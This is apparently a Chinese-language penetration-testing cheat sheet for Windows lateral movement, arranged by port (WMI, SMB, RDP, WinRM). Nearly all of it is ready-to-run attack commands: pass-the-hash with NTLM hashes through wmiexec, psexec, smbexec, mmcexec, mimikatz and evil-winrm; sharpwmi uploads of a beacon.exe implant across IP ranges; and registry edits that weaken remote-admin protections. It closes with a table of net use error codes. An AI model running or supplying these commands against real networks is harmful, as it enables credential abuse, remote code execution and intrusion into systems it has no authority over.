135端口

执行命令

text
1
2
python wmiexec-pro.py administrator:Admin12345@192.168.186.136 exec-command -command "whoami" -with-output
python wmiexec-pro.py -hashes :5571e12eef026de606df1ff9d4dab6f8 administrator@192.168.204.72 exec-command -command "whoami" -with-output

img

上传文件

text
1
python wmiexec-pro.py administrator:Admin12345@192.168.186.136 filetransfer -upload -src-file "/root/Desktop/decode.exe" -dest-file "C:\users\public\test.exe"

img

wmiexec

plaintext
1
2
python wmiexec.py -hashes :2687cb433215956d4ededb0d00334118 Tom@192.168.0.220
wmiexec.exe -hashes :2687cb433215956d4ededb0d00334118 Tom@192.168.0.220

image-20220610140854546

这里过不去的需要在目标机器上开启注册表

plaintext
1
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

image-20220610142601778

image-20220610141220407

WMIHACKER

https://github.com/rootclay/WMIHACKER

plaintext
1
cscript WMIHACKER_0.6.vbs /cmd 10.10.10.10 administrator "123456" "ipconfig" 1

image-20220816164203617

sharpwmi

个人常用的一款,可以上传文件,但是文件大小限制512kb内

https://github.com/QAX-A-Team/sharpwmi

https://github.com/idiotc4t/sharpwmi

plaintext
1
2
3
4
5
sharpwmi.exe login 192.168.2.3 administrator 123 cmd whoami
sharpwmi.exe login 192.168.2.3/24 administrator 123 cmd whoami
sharpwmi.exe login 192.168.2.3-23 administrator 123 upload beacon.exe c:\beacon.exe
sharpwmi.exe pth 192.168.2.3-192.168.2.77 cmd whoami
sharpwmi.exe pth 192.168.2.3/255.255.255.0 upload beacon.exe c:\beacon.exe

image-20220915162957578

445端口

smbexec

plaintext
1
smbexec.exe administrator:"mima"@10.61.9.46

psexec

这里使用的impacket工具包里的,微软自带的psexec不能使用hash进行传递

plaintext
1
2
net use \\10.0.249.11\ipc$ "123456" /user:admin
psexec.exe \\10.0.249.11 -u admin -p "123456" whoami
plaintext
1
2
python psexec.py -hashes :ccef208c6485269c20db2cad21734fe7 administrator@192.168.0.100
psexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 administrator@192.168.0.100

image-20220624115318502

image-20220624143404133

mmcexec

plaintext
1
mmcexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 administrator@192.168.0.100

image-20220624142529053

3389端口

修改注册表

plaintext
1
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

mimikatz进行hash传递,之后会弹出一个框,填入相应的IP即可

plaintext
1
2
privilege::debug
sekurlsa::pth /user:dyy /domain:. /ntlm::2687cb433215956d4ededb0d00334118 "/run:mstsc.exe /restrictedadmin"

image-20220624090235257

image-20220624090530776

5985端口

evil-winrm

这里先安装ruby环境,https://rubyinstaller.org

plaintext
1
gem install evil-winrm
plaintext
1
evil-winrm -i 192.168.0.100 -u administrator -H ccef208c6485269c20db2cad21734fe7

image-20220624154730524

报错异常情况

plaintext
1
2
3
4
5
6
7
8
9
10
错误号5,拒绝访问:很可能你使⽤的⽤户不是管理员权限的(#先提升权限)
错误号51,Windows⽆法找到⽹络路径(#⽹络有问题)
错误号53,找不到⽹络路径:ip地址错误;⽬标末开机(#⽬标lanmanserver服务未启动;⽬标有
防⽕墙(端⼝过滤)
错误号67,找不到⽹络名(#你的lanmanworkstation服务末启动;⽬标删除了ipc$)
错误号1219,提供的凭据与⼰存在的凭据集冲突(#你已经和对⽅建⽴了⼀个ipc$,请删除在连)
错误号1326,未知的⽤户名或错误密码(#原因很明显)
错误号1792,试图登录,但是⽹络登录服务没有启动(#⽬标NetLogon服务末启动。(连接域控
会出现此情况)
错误号2242,此⽤户的密码⼰经过期(#⽬标有帐号策略,强制定期要求更改密码)